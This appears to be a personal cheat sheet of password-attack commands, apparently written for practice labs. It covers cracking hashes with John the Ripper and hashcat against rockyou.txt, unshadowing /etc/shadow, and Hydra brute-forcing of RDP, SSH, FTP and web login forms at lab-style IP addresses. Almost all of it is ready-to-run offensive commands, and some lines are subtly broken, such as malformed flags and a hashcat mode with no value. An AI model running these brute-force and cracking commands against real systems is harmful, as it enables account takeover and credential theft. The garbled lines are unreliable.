

Password Cracking


#john
john --wordlist=/usr/share/wordlists/rockyou.txt  <file name>

#sometimes if you done hash dump from windows
john --wordlist=/usr/share/wordlists/rockyou.txt  --format=NT  <file name>

john --wordlist=/usr/…../rockyou.txt –users=admin  <file name>

john --show <file name>
/usr/shre/john/office2john.py   # crack office Document

# may be ask for /etc/shadow use sudo 
# unshadow /etc/shadow for linux

--------------------------------------------------------------------



Hash-identifier    #linux identify hash

# john can identifiy hash type

Hash Crack
https://crackstation.net/
https://hashes.com/en/decrypt/hash

----------------------------------------------------------------------

#Hashcat
Hashcat –a0  -m  -o  < result name.txt> <file want to crack.txt>   /rockyou.txt
-m hash mode #Ntlm 1000 # sha512 linux 1800


#or this working very will

hashcat -a0 -m1800 a1  /rockyou.txt



hashcat -m1400  "F09EDCB1FCEFC6DFB23DC3505A882655FF77375ED8AA2D1C13F640FCCC2D0C85"  /usr/share/wordlists/rockyou.txt



https://hashcat.net/wiki/doku.php?id=example_hashes


-----------------------------------------------------------------------



Hydra
hydra –U rdp   # show help information how to use   #SSh.Rdp,ftp,telnet….

hydra  -L userlist.txt  -P passwordlist.txt service://ip   –F –v

hydra 192.168.102.112 ftp –L /user…/  -P /usr/../   -F –v

-L # LIST USERS / -l # ONLY ONE USER
-P # LIST PASSWORD /-p # ONLY ONE PASSWORD

---------------------------------------------------------------------
Post Web Form Bruteforce with Hydra


hydra -l <username> -P <wordlist> 10.10.98.22 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V


or


hydra -l <username> -P <wordlist> 10.10.98.22 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V



ex.   

hydra -l molly -P /home/suhib/passlist.txt  10.10.98.22 http-post-form "/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect." -v


#username field name when you check login page source (can be changable)

#password  field name when you check login page source  (can be changable)




----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

ftp>ls –lat
ftp> cd /etc/name
ftp> ls
ftp>get <file name> 
ftp>find *.txt

#on explore ftp://ip
